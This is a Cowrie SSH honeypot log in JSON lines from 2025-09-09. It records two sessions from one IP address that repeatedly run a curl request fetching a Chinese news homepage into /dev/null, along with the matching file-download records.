{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.576261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.597111Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.599692Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.603223Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.605572Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.610114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.611112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.636603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.637750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.644807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.645718Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.656334Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.658154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.663856Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.676640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.677663Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.682549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.683430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.686721Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.723170Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.724323Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.726570Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.727918Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.729982Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.741646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.764918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.765849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.768013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.768936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.782979Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.802874Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.804407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.805668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.809874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.811167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.824106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.825788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.827620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.830564Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.846657Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.848045Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.851271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.852318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.886829Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.888225Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.891646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.892770Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.925113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.926415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.932719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.933828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.966409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.967784Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:04.976334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:04.977464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.000871Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.006082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.007358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.016302Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.017552Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.034217Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.042020Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.044115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.045358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.057820Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.059786Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.062930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.063886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.082387Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.091226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.092285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.096831Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.112852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.113886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.130744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.131952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.155367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.156498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.173852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.175079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.183168Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.184857Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.194602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.195886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.215039Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.216028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.234158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.235177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.242409Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.255289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.256553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
